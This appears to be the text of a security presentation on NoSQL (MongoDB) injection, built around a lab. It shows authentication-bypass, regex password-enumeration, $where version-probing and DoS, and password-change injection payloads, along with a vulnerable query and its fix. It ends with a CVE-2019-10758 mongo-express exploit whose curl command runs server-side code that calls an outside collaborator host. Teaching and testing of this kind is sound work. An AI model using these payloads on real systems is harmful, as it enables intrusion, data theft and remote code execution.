  • 5. Data Store in SQL vs NoSQL [ { "id" : 1, "username" : "admin", "password" : "P@$$w0rD", "2FA" : "Enable" }, { "id" : 2, "username" : "user1", "password" : "123456" }, { "id" : 3, "username" : "user2" } ] id username password 2FA 1 admin P@$$w0rD Enable 2 user1 123456 null 3 user2 null null SQL Database NoSQL Database
  • 6. Query Structure SQL: SELECT * FROM table WHERE username = ‘$username’ AND password = ‘$password’ NoSQL: db.collection.find({username: “$username”, password: “$password”}); Query Operators in NoSQL: $ne -> not equal $gt -> greater than $regex -> regular expression $where -> clause lets you specify a script to filter results
  • 7. NoSQL Injection NoSQL Injection is security vulnerability that lets attackers take control of database queries through the unsafe use of user input. It can be used by an attacker to: Expose unauthorized information. Modify data. ➢ db.items.find(queryObject) ○ db — current database object ○ Items — collection names ‘items’ in the current database ○ find — method to execute on the collection ○ queryObject — an object used to select data
  • 8. LAB Creation In this NoSQL Lab, I have implemented lab with actual and possible attack scenarios. 1 VM LAB Use Alpine or Ubuntu system as per requirement. Installed Dependencies MongoDB and NodeJS Installation. 2 Build Code Create possible scenarios of attack and write the code. 3 Run & Test Deploy the code and try to bypass the mechanism. 4
  • 9. LAB Walkthrough Possible Attack Vectors: Authentication Bypass Enumeration Data manipulation MongoDB Injection DOS and more.
  • 11. Authentication Bypass Backend query will be: {id: {"$ne":0}, email: "muzkkir%40net-square.com", password: "", "password": {"$ne":0}, "email": "muzkkir@net-square.com" } Reason: var query = "{ "_id" : "+id+","email": ""+email+"" , "password" : ""+password+"" }"; Fix: Var query = { “_id” : id , ” email” : email , “password” : password }
  • 13. Enumeration of Password "Password" : { "$regex" : "n*" } "Password" : { "$regex" : "n8K*" } "Password" : { "$regex" : "n8K!3*" } "Password" : { "$regex" : "n8K!3p6" } Enumerating other users password: id={"$ne":0}&email=ravi%40net-square.com&password=","password":{"$regex":""} ,"email":"ravi@net-square.com
  • 17. { "$where" : "function(){ return( version()[0] == '3' );}" } { "$where" : "function(){ return( version()[1] == '.' );}" } { "$where" : "function(){ return( version()[2] == '6' );}" } { "$where" : "function(){ return( version()[3] == '.' );}" } { "$where" : "function(){ return( version()[4] == '8' );}" } Version = “3.6.8” Other Functions: sleep(500) -> Delay 5 seconds in response If else condition -> run function to retrieve more information Var i=1;while(1){use i=i+1} -> Resource Exhaustion (DOS) MongoDB Injection
  • 18. Data Injecting to change password
  • 19. Data Injecting to change password email=muzkkir@net-square.com&time=2:34:42","password":"123456
  • 22. Console Logs InSecure Coding Query… Secure Coding Query...
  • 23. CVE-2019-10758 Vulnerability: mongo-express@0.53.0 Exploit: curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://cvbytcxi73hi1p93tya3ubmcm3stgi.burpcollaborator.net")'